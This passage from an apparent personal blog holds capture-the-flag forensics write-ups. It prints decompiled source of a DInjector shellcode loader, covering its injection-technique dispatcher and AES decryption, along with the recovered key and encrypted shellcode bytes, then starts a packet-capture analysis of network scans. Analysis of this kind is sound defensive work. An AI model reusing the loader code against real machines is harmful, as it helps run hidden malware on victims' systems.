class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">1337743390</span><span class="p">:</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">s1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"clipboardpointer"</span><span class="p">))</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="n">ClipboardPointer</span><span class="p">.</span><span class="n">Execute</span><span class="p">(</span><span class="n">numArray</span><span class="p">);</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">1581928577</span><span class="p">:</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">s1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"currentthreaduuid"</span><span class="p">))</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="n">CurrentThreadUuid</span><span class="p">.</span><span class="n">Execute</span><span class="p">(</span><span class="n">Encoding</span><span class="p">.</span><span class="n">UTF8</span><span class="p">.</span><span class="n">GetString</span><span class="p">(</span><span class="n">numArray</span><span class="p">));</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">1633653762</span><span class="p">:</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">s1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"remotethreadcontext"</span><span class="p">))</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="n">RemoteThreadContext</span><span class="p">.</span><span class="n">Execute</span><span class="p">(</span><span class="n">numArray</span><span class="p">,</span><span class="w"> </span><span class="n">dictionary</span><span class="p">[</span><span class="s">"/image"</span><span class="p">],</span><span class="w"> </span><span class="n">ppid</span><span class="p">,</span><span class="w"> </span><span class="n">blockDlls</span><span class="p">);</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">2000324974</span><span class="p">:</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">s1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"remotethreadview"</span><span class="p">))</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="n">RemoteThreadView</span><span class="p">.</span><span class="n">Execute</span><span class="p">(</span><span class="n">numArray</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="p">.</span><span class="n">Parse</span><span class="p">(</span><span class="n">dictionary</span><span class="p">[</span><span class="s">"/pid"</span><span class="p">]));</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">2145053022</span><span class="p">:</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">s1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"currentthread"</span><span class="p">))</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="n">CurrentThread</span><span class="p">.</span><span class="n">Execute</span><span class="p">(</span><span class="n">numArray</span><span class="p">);</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">2585521376</span><span class="p">:</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">s1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"remotethreadsuspended"</span><span class="p">))</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="n">RemoteThreadSuspended</span><span class="p">.</span><span class="n">Execute</span><span class="p">(</span><span class="n">numArray</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="p">.</span><span class="n">Parse</span><span class="p">(</span><span class="n">dictionary</span><span class="p">[</span><span class="s">"/pid"</span><span class="p">]));</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">2602728598</span><span class="p">:</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">s1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"functionpointer"</span><span class="p">))</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="n">FunctionPointer</span><span class="p">.</span><span class="n">Execute</span><span class="p">(</span><span class="n">numArray</span><span class="p">);</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">3284651259</span><span class="p">:</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">s1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"remotethreadapc"</span><span class="p">))</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="n">RemoteThreadAPC</span><span class="p">.</span><span class="n">Execute</span><span class="p">(</span><span class="n">numArray</span><span class="p">,</span><span class="w"> </span><span class="n">dictionary</span><span class="p">[</span><span class="s">"/image"</span><span class="p">],</span><span class="w"> </span><span class="n">ppid</span><span class="p">,</span><span class="w"> </span><span class="n">blockDlls</span><span class="p">);</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="mi">3819032365</span><span class="p">:</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">s1</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="s">"remotethreaddll"</span><span class="p">))</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="n">RemoteThreadDll</span><span class="p">.</span><span class="n">Execute</span><span class="p">(</span><span class="n">numArray</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="p">.</span><span class="n">Parse</span><span class="p">(</span><span class="n">dictionary</span><span class="p">[</span><span class="s">"/pid"</span><span class="p">]),</span><span class="w"> </span><span class="n">dictionary</span><span class="p">[</span><span class="s">"/dll"</span><span class="p">]);</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="p">}</span> </code></pre></div> <p>Most importantly for us, we can see that the 9tVI0 is shell code that is password protected and needs decrypted.</p> <p>I checked the AES.cs file as well because we need to know how the Decrypt() method is working. It's source is here:</p> <div class="highlight"><pre><span></span><code><span class="k">using</span><span class="w"> </span><span class="nn">System.Collections.Generic</span><span class="p">;</span> <span class="k">using</span><span class="w"> </span><span class="nn">System.IO</span><span class="p">;</span> <span class="k">using</span><span class="w"> </span><span class="nn">System.Linq</span><span class="p">;</span> <span class="k">using</span><span class="w"> </span><span class="nn">System.Security.Cryptography</span><span class="p">;</span> <span class="k">using</span><span class="w"> </span><span class="nn">System.Text</span><span class="p">;</span> <span class="k">namespace</span><span class="w"> </span><span class="nn">DInjector</span> <span class="p">{</span> <span class="w"> </span><span class="k">internal</span><span class="w"> </span><span class="k">class</span><span class="w"> </span><span class="nc">AES</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">private</span><span class="w"> </span><span class="kt">byte</span><span class="p">[]</span><span class="w"> </span><span class="n">key</span><span class="p">;</span> <span class="w"> </span><span class="k">public</span><span class="w"> </span><span class="nf">AES</span><span class="p">(</span><span class="kt">string</span><span class="w"> </span><span class="n">password</span><span class="p">)</span><span class="w"> </span><span class="o">=&gt;</span><span class="w"> </span><span class="k">this</span><span class="p">.</span><span class="n">key</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SHA256</span><span class="p">.</span><span class="n">Create</span><span class="p">().</span><span class="n">ComputeHash</span><span class="p">(</span><span class="n">Encoding</span><span class="p">.</span><span class="n">UTF8</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">password</span><span class="p">));</span> <span class="w"> </span><span class="k">private</span><span class="w"> </span><span class="kt">byte</span><span class="p">[]</span><span class="w"> </span><span class="nf">PerformCryptography</span><span class="p">(</span><span class="n">ICryptoTransform</span><span class="w"> </span><span class="n">cryptoTransform</span><span class="p">,</span><span class="w"> </span><span class="kt">byte</span><span class="p">[]</span><span class="w"> </span><span class="n">data</span><span class="p">)</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">using</span><span class="w"> </span><span class="p">(</span><span class="n">MemoryStream</span><span class="w"> </span><span class="n">memoryStream</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">MemoryStream</span><span class="p">())</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">using</span><span class="w"> </span><span class="p">(</span><span class="n">CryptoStream</span><span class="w"> </span><span class="n">cryptoStream</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">CryptoStream</span><span class="p">((</span><span class="n">Stream</span><span class="p">)</span><span class="w"> </span><span class="n">memoryStream</span><span class="p">,</span><span class="w"> </span><span class="n">cryptoTransform</span><span class="p">,</span><span class="w"> </span><span class="n">CryptoStreamMode</span><span class="p">.</span><span class="n">Write</span><span class="p">))</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">cryptoStream</span><span class="p">.</span><span class="n">Write</span><span class="p">(</span><span class="n">data</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">data</span><span class="p">.</span><span class="n">Length</span><span class="p">);</span> <span class="w"> </span><span class="n">cryptoStream</span><span class="p">.</span><span class="n">FlushFinalBlock</span><span class="p">();</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">memoryStream</span><span class="p">.</span><span class="n">ToArray</span><span class="p">();</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">public</span><span class="w"> </span><span class="kt">byte</span><span class="p">[]</span><span class="w"> </span><span class="nf">Decrypt</span><span class="p">(</span><span class="kt">byte</span><span class="p">[]</span><span class="w"> </span><span class="n">data</span><span class="p">)</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">using</span><span class="w"> </span><span class="p">(</span><span class="n">AesCryptoServiceProvider</span><span class="w"> </span><span class="n">cryptoServiceProvider</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">AesCryptoServiceProvider</span><span class="p">())</span> <span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="kt">byte</span><span class="p">[]</span><span class="w"> </span><span class="n">array1</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">((</span><span class="n">IEnumerable</span><span class="o">&lt;</span><span class="kt">byte</span><span class="o">&gt;</span><span class="p">)</span><span class="w"> </span><span class="n">data</span><span class="p">).</span><span class="n">Take</span><span class="o">&lt;</span><span class="kt">byte</span><span class="o">&gt;</span><span class="p">(</span><span class="mi">16</span><span class="p">).</span><span class="n">ToArray</span><span class="o">&lt;</span><span class="kt">byte</span><span class="o">&gt;</span><span class="p">();</span> <span class="w"> </span><span class="kt">byte</span><span class="p">[]</span><span class="w"> </span><span class="n">array2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">((</span><span class="n">IEnumerable</span><span class="o">&lt;</span><span class="kt">byte</span><span class="o">&gt;</span><span class="p">)</span><span class="w"> </span><span class="n">data</span><span class="p">).</span><span class="n">Skip</span><span class="o">&lt;</span><span class="kt">byte</span><span class="o">&gt;</span><span class="p">(</span><span class="mi">16</span><span class="p">).</span><span class="n">Take</span><span class="o">&lt;</span><span class="kt">byte</span><span class="o">&gt;</span><span class="p">(</span><span class="n">data</span><span class="p">.</span><span class="n">Length</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">16</span><span class="p">).</span><span class="n">ToArray</span><span class="o">&lt;</span><span class="kt">byte</span><span class="o">&gt;</span><span class="p">();</span> <span class="w"> </span><span class="n">cryptoServiceProvider</span><span class="p">.</span><span class="n">Key</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">this</span><span class="p">.</span><span class="n">key</span><span class="p">;</span> <span class="w"> </span><span class="n">cryptoServiceProvider</span><span class="p">.</span><span class="n">IV</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">array1</span><span class="p">;</span> <span class="w"> </span><span class="n">cryptoServiceProvider</span><span class="p">.</span><span class="n">Mode</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CipherMode</span><span class="p">.</span><span class="n">CBC</span><span class="p">;</span> <span class="w"> </span><span class="n">cryptoServiceProvider</span><span class="p">.</span><span class="n">Padding</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">PaddingMode</span><span class="p">.</span><span class="n">PKCS7</span><span class="p">;</span> <span class="w"> </span><span class="k">using</span><span class="w"> </span><span class="p">(</span><span class="n">ICryptoTransform</span><span class="w"> </span><span class="n">decryptor</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">cryptoServiceProvider</span><span class="p">.</span><span class="n">CreateDecryptor</span><span class="p">(</span><span class="n">cryptoServiceProvider</span><span class="p">.</span><span class="n">Key</span><span class="p">,</span><span class="w"> </span><span class="n">cryptoServiceProvider</span><span class="p">.</span><span class="n">IV</span><span class="p">))</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="k">this</span><span class="p">.</span><span class="n">PerformCryptography</span><span class="p">(</span><span class="n">decryptor</span><span class="p">,</span><span class="w"> </span><span class="n">array2</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="p">}</span> <span class="p">}</span> </code></pre></div> <p>Most important is the Key, IV and Mode to be able to decrypt. The mode is listed as <code>CipherMode.CBC</code>.</p> <p>I used a .NET Sandbox to write some code in order to generate the key and IV . For the key:</p> <div class="highlight"><pre><span></span><code><span class="kt">string</span><span class="w"> </span><span class="n">password</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"z64&amp;Rx27Z$B%73up"</span><span class="p">;</span> <span class="w"> </span><span class="kt">byte</span><span class="p">[]</span><span class="w"> </span><span class="n">key</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SHA256</span><span class="p">.</span><span class="n">Create</span><span class="p">().</span><span class="n">ComputeHash</span><span class="p">(</span><span class="n">Encoding</span><span class="p">.</span><span class="n">UTF8</span><span class="p">.</span><span class="n">GetBytes</span><span class="p">(</span><span class="n">password</span><span class="p">));</span> <span class="w"> </span><span class="n">StringBuilder</span><span class="w"> </span><span class="n">builder</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">new</span><span class="w"> </span><span class="n">StringBuilder</span><span class="p">();</span><span class="w"> </span> <span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="n">key</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span> <span class="w"> </span><span class="p">{</span><span class="w"> </span> <span class="w"> </span><span class="n">builder</span><span class="p">.</span><span class="n">Append</span><span class="p">(</span><span class="n">key</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">ToString</span><span class="p">(</span><span class="s">"x2"</span><span class="p">));</span><span class="w"> </span> <span class="w"> </span><span class="p">}</span><span class="w"> </span> <span class="w"> </span><span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="n">builder</span><span class="p">.</span><span class="n">ToString</span><span class="p">());</span> <span class="c1">// 0996cb714b12ed96972979398e78724df2a1fa0a1c01372975fdb07e2a15ee15</span> </code></pre></div> <p>The IV is the first 16 bytes of the data. In Wireshark, we can view the hexdump of the file:</p> <div class="highlight"><pre><span></span><code><span class="m">0000</span><span class="w"> </span><span class="m">99</span><span class="w"> </span><span class="m">07</span><span class="w"> </span>bb<span class="w"> </span><span class="m">67</span><span class="w"> </span>9e<span class="w"> </span><span class="m">17</span><span class="w"> </span><span class="m">65</span><span class="w"> </span>dc<span class="w"> </span>bd<span class="w"> </span>b4<span class="w"> </span><span class="m">67</span><span class="w"> </span>c1<span class="w"> </span>c4<span class="w"> </span>b0<span class="w"> </span>0d<span class="w"> </span><span class="m">21</span><span class="w"> </span>&middot;&middot;&middot;g&middot;&middot;e&middot;<span class="w"> </span>&middot;&middot;g&middot;&middot;&middot;&middot;! <span class="m">0010</span><span class="w"> </span>3b<span class="w"> </span>3f<span class="w"> </span><span class="m">70</span><span class="w"> </span><span class="m">86</span><span class="w"> </span><span class="m">79</span><span class="w"> </span>dc<span class="w"> </span><span class="m">12</span><span class="w"> </span>e5<span class="w"> </span><span class="m">35</span><span class="w"> </span>2f<span class="w"> </span>f4<span class="w"> </span>ac<span class="w"> </span>0f<span class="w"> </span>bb<span class="w"> </span>df<span class="w"> </span>6a<span class="w"> </span><span class="p">;</span>?p&middot;y&middot;&middot;&middot;<span class="w"> </span><span class="m">5</span>/&middot;&middot;&middot;&middot;&middot;j <span class="m">0020</span><span class="w"> </span><span class="m">57</span><span class="w"> </span>e4<span class="w"> </span>fa<span class="w"> </span><span class="m">09</span><span class="w"> </span>4a<span class="w"> </span>4d<span class="w"> </span><span class="m">03</span><span class="w"> </span>ff<span class="w"> </span>ba<span class="w"> </span>9e<span class="w"> </span>f2<span class="w"> </span><span class="m">51</span><span class="w"> </span>c2<span class="w"> </span>c5<span class="w"> </span><span class="m">71</span><span class="w"> </span><span class="m">00</span><span class="w"> </span>W&middot;&middot;&middot;JM&middot;&middot;<span class="w"> </span>&middot;&middot;&middot;Q&middot;&middot;q&middot; <span class="m">0030</span><span class="w"> </span>df<span class="w"> </span><span class="m">04</span><span class="w"> </span>df<span class="w"> </span>f8<span class="w"> </span><span class="m">82</span><span class="w"> </span>dc<span class="w"> </span>d4<span class="w"> </span><span class="m">37</span><span class="w"> </span>3e<span class="w"> </span>0d<span class="w"> </span>0b<span class="w"> </span>ba<span class="w"> </span>5c<span class="w"> </span>6b<span class="w"> </span><span class="m">64</span><span class="w"> </span>2c<span class="w"> </span>&middot;&middot;&middot;&middot;&middot;&middot;&middot;7<span class="w"> </span>&gt;&middot;&middot;&middot;<span class="se">\k</span>d, <span class="m">0040</span><span class="w"> </span>4e<span class="w"> </span>4d<span class="w"> </span>7e<span class="w"> </span>2e<span class="w"> </span><span class="m">46</span><span class="w"> </span>bd<span class="w"> </span><span class="m">25</span><span class="w"> </span>c2<span class="w"> </span>0c<span class="w"> </span><span class="m">58</span><span class="w"> </span><span class="m">65</span><span class="w"> </span>c0<span class="w"> </span><span class="m">27</span><span class="w"> </span>fa<span class="w"> </span>c0<span class="w"> </span>ca<span class="w"> </span>NM~.F&middot;%&middot;<span class="w"> </span>&middot;Xe&middot;<span class="s1">'&middot;&middot;&middot;</span> <span class="s1">0050 d8 a0 12 0d 3e 5e fd 31 c8 f1 6f b8 7b f9 07 18 &middot;&middot;&middot;&middot;&gt;^&middot;1 &middot;&middot;o&middot;{&middot;&middot;&middot;</span> <span class="s1">0060 b9 1b 47 59 2f ac 88 34 dc 1b 1c 92 d1 ef a0 08 &middot;&middot;GY/&middot;&middot;4 &middot;&middot;&middot;&middot;&middot;&middot;&middot;&middot;</span> <span class="s1">0070 7e dd 67 87 46 42 1c 01 d4 d2 2a a3 b6 00 64 9d ~&middot;g&middot;FB&middot;&middot; &middot;&middot;*&middot;&middot;&middot;d&middot;</span> <span class="s1">0080 aa cd 7f 0d 2f 7e 9a 9c 90 57 c1 3e a6 79 8c 15 &middot;&middot;&middot;&middot;/~&middot;&middot; &middot;W&middot;&gt;&middot;y&middot;&middot;</span> <span class="s1">0090 8f d8 43 de 55 65 42 ac 47 7f 20 f6 38 6d f5 35 &middot;&middot;C&middot;UeB&middot; G&middot; &middot;8m&middot;5</span> <span class="s1">00A0 a5 dd 46 19 9b 16 8b b2 b1 3d c3 2e e1 c9 d4 b2 &middot;&middot;F&middot;&middot;&middot;&middot;&middot; &middot;=&middot;.&middot;&middot;&middot;&middot;</span> <span class="s1">00B0 01 47 44 2d 08 df d1 94 1a e0 34 b5 ff 76 a8 9f &middot;GD-&middot;&middot;&middot;&middot; &middot;&middot;4&middot;&middot;v&middot;&middot;</span> <span class="s1">00C0 01 cd f1 6a 35 e2 57 92 7c aa 02 d2 b6 54 bb 85 &middot;&middot;&middot;j5&middot;W&middot; |&middot;&middot;&middot;&middot;T&middot;&middot;</span> <span class="s1">00D0 de 27 57 a0 a4 27 93 72 1b bc 25 7d 90 b7 57 dd &middot;'</span>W&middot;&middot;<span class="err">'</span>&middot;r<span class="w"> </span>&middot;&middot;%<span class="o">}</span>&middot;&middot;W&middot; 00E0<span class="w"> </span><span class="m">08</span><span class="w"> </span><span class="m">47</span><span class="w"> </span>d3<span class="w"> </span><span class="m">31</span><span class="w"> </span><span class="m">77</span><span class="w"> </span>6b<span class="w"> </span>b6<span class="w"> </span>b9<span class="w"> </span><span class="m">68</span><span class="w"> </span><span class="m">00</span><span class="w"> </span><span class="m">16</span><span class="w"> </span>8f<span class="w"> </span><span class="m">12</span><span class="w"> </span><span class="m">20</span><span class="w"> </span><span class="m">49</span><span class="w"> </span><span class="m">38</span><span class="w"> </span>&middot;G&middot;1wk&middot;&middot;<span class="w"> </span>h&middot;&middot;&middot;&middot;<span class="w"> </span>I8 00F0<span class="w"> </span>fb<span class="w"> </span>ec<span class="w"> </span><span class="m">00</span><span class="w"> </span>3c<span class="w"> </span>e9<span class="w"> </span>ab<span class="w"> </span>5e<span class="w"> </span><span class="m">90</span><span class="w"> </span>b5<span class="w"> </span>bc<span class="w"> </span><span class="m">57</span><span class="w"> </span>b9<span class="w"> </span>ac<span class="w"> </span><span class="m">79</span><span class="w"> </span>ef<span class="w"> </span>c4<span class="w"> </span>&middot;&middot;&middot;&lt;&middot;&middot;^&middot;<span class="w"> </span>&middot;&middot;W&middot;&middot;y&middot;&middot; <span class="m">0100</span><span class="w"> </span><span class="m">05</span><span class="w"> </span><span class="m">16</span><span class="w"> </span><span class="m">30</span><span class="w"> </span><span class="m">28</span><span class="w"> </span>bd<span class="w"> </span>0c<span class="w"> </span><span class="m">49</span><span class="w"> </span>4d<span class="w"> </span><span class="m">47</span><span class="w"> </span>db<span class="w"> </span>4f<span class="w"> </span><span class="m">97</span><span class="w"> </span>3d<span class="w"> </span><span class="m">43</span><span class="w"> </span>dd<span class="w"> </span><span class="m">62</span><span class="w"> </span>&middot;&middot;0<span class="o">(</span>&middot;&middot;IM<span class="w"> </span>G&middot;O&middot;<span class="o">=</span>C&middot;b <span class="m">0110</span><span class="w"> </span>df<span class="w"> </span>1e<span class="w"> </span>eb<span class="w"> </span><span class="m">80</span><span class="w"> </span><span class="m">91</span><span class="w"> </span><span class="m">05</span><span class="w"> </span>af<span class="w"> </span>ff<span class="w"> </span>6d<span class="w"> </span>6e<span class="w"> </span>8a<span class="w"> </span>0e<span class="w"> </span>a6<span class="w"> </span><span class="m">53</span><span class="w"> </span>ec<span class="w"> </span>9c<span class="w"> </span>&middot;&middot;&middot;&middot;&middot;&middot;&middot;&middot;<span class="w"> </span>mn&middot;&middot;&middot;S&middot;&middot; <span class="m">0120</span><span class="w"> </span><span class="m">03</span><span class="w"> </span>a6<span class="w"> </span><span class="m">20</span><span class="w"> </span><span class="m">95</span><span class="w"> </span><span class="m">49</span><span class="w"> </span><span class="m">81</span><span class="w"> </span>f6<span class="w"> </span>5b<span class="w"> </span>db<span class="w"> </span><span class="m">47</span><span class="w"> </span><span class="m">14</span><span class="w"> </span>ab<span class="w"> </span>bd<span class="w"> </span>cf<span class="w"> </span><span class="m">16</span><span class="w"> </span><span class="m">13</span><span class="w"> </span>&middot;&middot;<span class="w"> </span>&middot;I&middot;&middot;<span class="o">[</span><span class="w"> </span>&middot;G&middot;&middot;&middot;&middot;&middot;&middot; <span class="m">0130</span><span class="w"> </span><span class="nb">fc</span><span class="w"> </span>e7<span class="w"> </span>a8<span class="w"> </span><span class="m">44</span><span class="w"> </span>f0<span class="w"> </span>c7<span class="w"> </span><span class="m">94</span><span class="w"> </span>dd<span class="w"> </span>2b<span class="w"> </span>a1<span class="w"> </span><span class="m">81</span><span class="w"> </span><span class="m">14</span><span class="w"> </span><span class="m">35</span><span class="w"> </span>fa<span class="w"> </span><span class="m">62</span><span class="w"> </span>ee<span class="w"> </span>&middot;&middot;&middot;D&middot;&middot;&middot;&middot;<span class="w"> </span>+&middot;&middot;&middot;5&middot;b&middot; <span class="m">0140</span><span class="w"> </span>d2<span class="w"> </span>c3<span class="w"> </span>da<span class="w"> </span><span class="m">75</span><span class="w"> </span><span class="m">34</span><span class="w"> </span><span class="m">37</span><span class="w"> </span>bc<span class="w"> </span>aa<span class="w"> </span><span class="m">47</span><span class="w"> </span><span class="m">22</span><span class="w"> </span><span class="m">73</span><span class="w"> </span>9e<span class="w"> </span>c3<span class="w"> </span><span class="m">65</span><span class="w"> </span>e1<span class="w"> </span>d6<span class="w"> </span>&middot;&middot;&middot;u47&middot;&middot;<span class="w"> </span>G<span class="s2">"s&middot;&middot;e&middot;&middot;</span> </code></pre></div> <p>The entire first line would then be the IV and the rest is what gets decoded. My full source code for the decryption is here:</p> <p>[gh]https://github.com/EricTurner3/cybersecurity/blob/main/HackTheBox/challenges/forensics/redfailure/decrypt.cs[/gh]</p> <p>Now with the shellcode, it is going to pass to RemoteThread.cs to actually execute.</p> <p>Following <a href="https://malwarenailed.blogspot.com/2018/09/reversing-shellcode-using-blobrunner.html">this article</a>, we can use a combination of ollydbg and blobrunner to try and decipher what the shellcode does. Using Cyberchef, I took the hexcode of the file and converted it to hex with a leading <code>\x</code>. Then I used <code>python -c 'print"\xdb...xb2") &gt; shellcode.bin'</code> to drop this file out for analysis:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/03/image-14.webp"/></p> <p>Just to ensure we are saving the file properly</p> <p>In my windows VM, run ollydbg and use shellcode.bin as the argument. Let it run until a message appears on the terminal screen:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/03/image-16.webp"/></p> <p>Debug time</p> <p>However when running the shellcode, I get an access violation and it is crashing each time. So it still seems I am stuck here!</p>2022-02-25T16:12:10-05:002022-02-25T16:12:10-05:00Eric Turnertag:blog.ericturner.it,2022-02-25:/2022/02/25/hackthebox-forensics-challenge-marketdump/

<p>Link: <a href="https://app.hackthebox.com/challenges/marketdump">https://app.hackthebox.com/challenges/marketdump</a></p> <p>This challenge provides us with a .zip that only contains a single MarketDump.pcapng file. The challenge description reads:</p> <blockquote> <p>We have got informed that a hacker managed to get into our internal network after pivoting through the web platform that runs in public …</p></blockquote>

<p>Link: <a href="https://app.hackthebox.com/challenges/marketdump">https://app.hackthebox.com/challenges/marketdump</a></p> <p>This challenge provides us with a .zip that only contains a single MarketDump.pcapng file. The challenge description reads:</p> <blockquote> <p>We have got informed that a hacker managed to get into our internal network after pivoting through the web platform that runs in public internet. He managed to bypass our small product stocks logging platform and then he got our costumer database file. We believe that only one of our costumers was targeted. Can you find out who the customer was?</p> <p>Challenge Description</p> </blockquote> <p>I opened up the .pcapng file in Wireshark, it has 2868 recorded packets. It appears the 10.0.2.15 IP appears to be the attacker in this case, and 10.0.2.3 must be the server that is running MySQL.</p> <p>Packet Capture Overview:</p> <ul> <li>The first 2000 or so packets just seem to be back and forth TCP calls with no real evidence of compromise. There was a server greeting from MySQL.</li> <li>After the first 2000 packets, the activity changes and we can see packets for SSH, MySQL and HTTP light up.</li> <li>By Packet 2104 a PSQL request for NT LANMAN appears.</li> <li>Packet 2172 shows a TCP segment of <code>random1random2random3random4</code></li> <li>Followed closely by a malformed DNS packet on 2181 that contains <code>krbtgt</code> in the payload. It appears the attacker is attempting to send malformed packets to get a golden ticket or gain access to the machine.</li> <li>Packet 2202 is a GET request for <code>/nice ports,/Trinity.txt.bak</code></li> <li>Packet 2242 is an OPTIONS request to port 53 of 10.0.2.3</li> <li>Packet 2296 contains segment data of NSPlayer 9.0.0.2 which is a typical User-Agent for the Windows Media Player Browser</li> <li>Packet 2305 contains <code>(CONNECT_DATA=(COMMAND=version))</code></li> <li>Packet 2314 contains <code>MSSQLServer</code></li> <li>Packet 2357 shows an nmap scripting engine GET request to <code>/nmaplowercheck1531136698</code></li> <li>Packet 2363 is a malformed packet containing <code>POST /sdk</code> with a <code>&lt;soap:Envelope&gt;... &lt;/soap:Envelope&gt;</code> body</li> <li>Packet 2366 is another <code>POST /sdk</code> with a similar body</li> <li>Packets 2368 &amp; 2370 are an initial Telnet connection that seems to go nowhere.</li> <li>Packet 2372, 2375, 2380 are a 400 Bad Requests</li> <li>Packet 2401, 10.0.2.15 reaches out to 10.0.2.3 with a <code>GET /HNAP1</code> with a Nmap Scripting Engine User-Agent</li> <li>Followed by several more Bad requests at 2404, 2408, 2410</li> <li>Packet 2413 returns a 404 Not found on 10.0.2.3 for <code>/sdk</code></li> <li>Packet 2415 returns a 404 Not found on 10.0.2.3 for <code>/nmaplowercheck1531136698</code></li> <li>Packet 2419 is a 200 OK which returns a HTML oage with 